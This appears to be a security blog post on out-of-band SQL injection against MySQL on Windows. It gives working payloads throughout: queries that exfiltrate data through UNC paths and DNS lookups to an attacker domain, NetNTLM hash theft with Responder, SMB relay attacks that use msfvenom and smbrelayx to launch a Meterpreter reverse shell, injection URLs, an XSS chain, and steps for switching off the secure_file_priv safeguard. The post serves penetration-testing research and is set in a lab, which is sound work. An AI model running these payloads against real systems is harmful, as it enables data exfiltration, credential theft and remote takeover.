MySQL Out-of-Band Hacking

Overview

Out-of-band injections are very well researched when it comes to MSSQL and Oracle. But in MySQL I noticed that this topic is not well researched. I thought of researching about this topic based on my experiences in SQL injections. For this purpose we can take advantage of functions such as load_file() and select ā€¦ into outfile/dumpfile. Apart from that we can also steal NetNTLM hashes and perform SMB relay attacks. All this is possible only in MySQL under Windows.

What is Out-of-Band Injection?

These attacks involve in alternative channels to extract data from the server. It might be HTTP(S) requests, DNS resolutions, file systems, E-mails, etc depending on the functionality of the back-end technology.

Limitations in MySQL

In MySQL there exists a global system variable known as ā€˜secure_file_privā€™. This variable is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT … INTO OUTFILE statements and the LOAD_FILE() function.

  • If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist, the server will not create it.
  • If the variable is empty it has no effect, thus insecure configuration.
  • If set to NULL, the server disables import and export operations. This value is permitted as of MySQL 5.5.53

Before MySQL 5.5.53 this variable is empty by default, hence allowing us to use these functions. But in the versions after 5.5.53 the value ā€˜NULLā€™ will disable these functions.
To check the value of this variable you can use any of these methods. The ā€˜secure_file_privā€™ is a global variable and itā€™s a read only variable, which means you cannot change this during runtime.

select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like "secure_file_priv"; 


For example the default value in my MySQL 5.5.34 is empty, which means we can use these functions.
5-5-34

In MySQL 5.6.34 by default the value is NULL and this will disable import and export operations.
5-6-34

Workaround

Here are few workarounds I came up with to overcome this issue in versions after 5.5.53.

  • Starting the mysqld process, giving ā€œ–secure-file-priv=ā€ parameter as empty.
mysqld.exe --secure-file-priv=
  • Adding an entry in the ā€œmy.iniā€ configuration file.
secure-file-priv=

To find out the order the default options are loaded and paths to the configuration files type this.

mysqld.exe --help --verbose
  • Pointing your configuration file to mysqld.exe

You can create a new file as ā€˜myfile.iniā€™ and give this file as the default configuration for MySQL.

mysqld.exe --defaults-file=myfile.ini

The content in your configuration.

[mysqld]
secure-file-priv=

Extracting Data to a File System

In MySQL we can use a shared file system as an alternative channel to extract data.

select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt';

select @@version into outfile '//192.168.0.100/temp/out.txt';
select @@version into dumpfile '//192.168.0.100/temp/out.txt';

Note that if quotes are filtered you cannot use hex conversions or any other format for the file path.

Extracting Data using DNS Resolutions

Another channel that can be used in MySQL is DNS resolutions.

select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874));

You can clearly see the version 5.6.34 is sent along with the DNS query.
wshark

When MySQL tries to resolve the DNS query we can log the DNS requests and extract data successfully from the ā€˜hacker.siteā€™ DNS server. Data is logged as a subdomain.
dnslogs

When extracting data note that you are dealing with DNS requests and special characters cannot be used. Make use of the MySQL string functions such as mid, substr, replace, etc to overcome such situations.

Stealing NetNTLM Hashes

As you have seen before that ā€˜load_fileā€™ and ā€˜into outfile/dumpfileā€™ works fine with UNC paths under Windows, this can be used to resolve a non-existing path and when DNS fails the request will be sent as an LLMNR, NetBIOS-NS query. By poisoning the LLMNR protocol we can capture the NTLMv2 hashes.
with-watermakr-copy
Tools that we can use for this attack.

I will be using Responder for this example. Iā€™m running MySQL 5.6.34 on Windows 8 64-bit.

responder -I eth0 -rv

Next we can use ā€˜load_fileā€™, ā€˜into outfile/dumpfileā€™ or ā€˜load data infileā€™ to resolve an invalid UNC path.

select load_file('\\\\error\\abc');
select load_file(0x5c5c5c5c6572726f725c5c616263);

select 'osanda' into dumpfile '\\\\error\\abc';
select 'osanda' into outfile '\\\\error\\abc';

load data infile '\\\\error\\abc' into table database.table_name;

ntlmv2

** UPDATE


You can steal NetNTLM hashes over the internet. Tested this with a VPS.
overinternet

SMB Relay Attacks

With the usage of functions such as ā€˜load_fileā€™, ā€˜into outfile/dumpfileā€™ and ā€˜load data infileā€™ we are able to access UNC paths under Windows. We can abuse this feature in performing SMB relay attacks and simply pop a shell in the target machine. Hereā€™s a visual demonstration of the SMB relay attack.
smb-relay-copy
This is my lab setup configuration for this experiment.

  • MySQL Server ā€“ Windows 8: 192.168.0.100
  • Attacker ā€“ Kali : 192.168.0.101
  • Victim ā€“ Windows 7: 192.168.0.103 (Running as Admin)

Tools used

First of all I generate a reverse shell on my Kali box and run ā€˜multi/handlerā€™ module on Metasploit.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=443  -f exe > reverse_shell.exe

Next I run the ā€˜smbrelayxā€™ tool specifying the victim IP address and my generated reverse shell and wait for incoming connections.

smbrelayx.py -h 192.168.0.103 -e ./reverse_shell.exe

Once we execute any of these statements from the MySQL server we get our reverse shell from the victim box.

select load_file('\\\\192.168.0.101\\aa');
select load_file(0x5c5c5c5c3139322e3136382e302e3130315c5c6161);

select 'osanda' into dumpfile '\\\\192.168.0.101\\aa';
select 'osanda' into outfile '\\\\192.168.0.101\\aa';

load data infile '\\\\192.168.0.101\\aa' into table database.table_name;

These are the options in Metasploit from the module ā€˜multi/handlerā€™.
msfoptions

Once the MySQL Server sends a request to the Kali box ā€˜smbrelayxā€™ will perform the SMB relay attack and upload our reverse shell and execute it.
smbrelayx

If the attack is successful we get our reverse shell from the Windows 7 box.
shell

Union and Error Based Injections

The ā€˜load_fileā€™ function can be applied with both union and error based injections. For example in a union based scenario we can use OOB injections like this.

http://192.168.0.100/?id=-1'+union+select+1,load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)),3-- -

We can simply use error based techniques such as the BIGINT overflow method or the EXP error based method.

http://192.168.0.100/?id=-1' or !(select*from(select   load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)))x)-~0-- -

http://192.168.0.100/?id=-1' or exp(~(select*from(select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)))a))-- -

Instead of ā€˜orā€™ you can use ||, |, and, &&, &, >>, <<, ^, xor, <=, <, ,>, >=, *, mul, /, div, -, +, %, mod.

XSS + SQLi

We can combine XSS attacks with MySQL and these might come handy in different scenarios in the penetration testing. We can perform both stealing of NetNTLM hashes and SMB relay attacks combining with XSS. If the XSS is persistent, each time the victim visits the page he will be infected.
Note that when dealing with JavaScript you are under the Same Origin Policy (SOP).

<svg onload=fetch(("http://192.168.0.100/?id=-1'+union+select+1,load_file(0x5c5c5c5c6572726f725c5c6161),3-- -"))>

You can also use MySQL to echo out HTML, thus echoing out an invalid UNC path to steal NetNTLM hashes or directly perform an SMB relay attack by using the IP of the attacker. These UNC paths get resolved only in IE web browsers.

http://192.168.0.100/?id=-1' union select 1,'<img src="\\\\error\\aa">'%23

Conclusion

These discussed methods can be used when all in-band methods fail due to the vectors being disabled, limited or filtered and when the only option is to use inference techniques. The ā€˜select ā€¦ into outfile/dumpfileā€™ can be used with union based injections. The ā€˜load_fileā€™ method can be used with both union based injections and error based injections. When it comes to infrastructure hacking these methods might be very useful. Exploitation of a vulnerability is not always straight forward. You have to be very creative in using these techniques in real world scenarios.

Acknowledgements

Special thanks to @m3g9tr0n for his support with my research.

Paper

References

  • https://dev.mysql.com/doc/refman/5.5/en/
  • https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
  • https://pentest.blog/what-is-llmnr-wpad-and-how-to-abuse-them-during-pentest/

SQLi is often a cancerous topic, if you plan to copy or share please give credits to the author.

http://tweetedtimes.com/v/1836

[tweet https://twitter.com/Hakin9/status/827569853997383680]
[tweet https://twitter.com/mubix/status/827911370855284737]
[tweet https://twitter.com/eForensics_Mag/status/827623227010715648]
[tweet https://twitter.com/binitamshah/status/833600213159915522]
[tweet https://twitter.com/x33fcon/status/832506871281913856]
[tweet https://twitter.com/lukapusic/status/832211395332755459]
[tweet https://twitter.com/nitr0usmx/status/832328146590461952]
[tweet https://twitter.com/kmkz_security/status/832508172514508800]
[tweet https://twitter.com/securitystreak/status/833679891711348737]
[tweet https://twitter.com/brennantom/status/833998995957698560]
[tweet https://twitter.com/i4isp/status/832575430242734080]
[tweet https://twitter.com/cody_zacharias/status/1155995716637978625]

16 thoughts on “MySQL Out-of-Band Hacking

Leave a Reply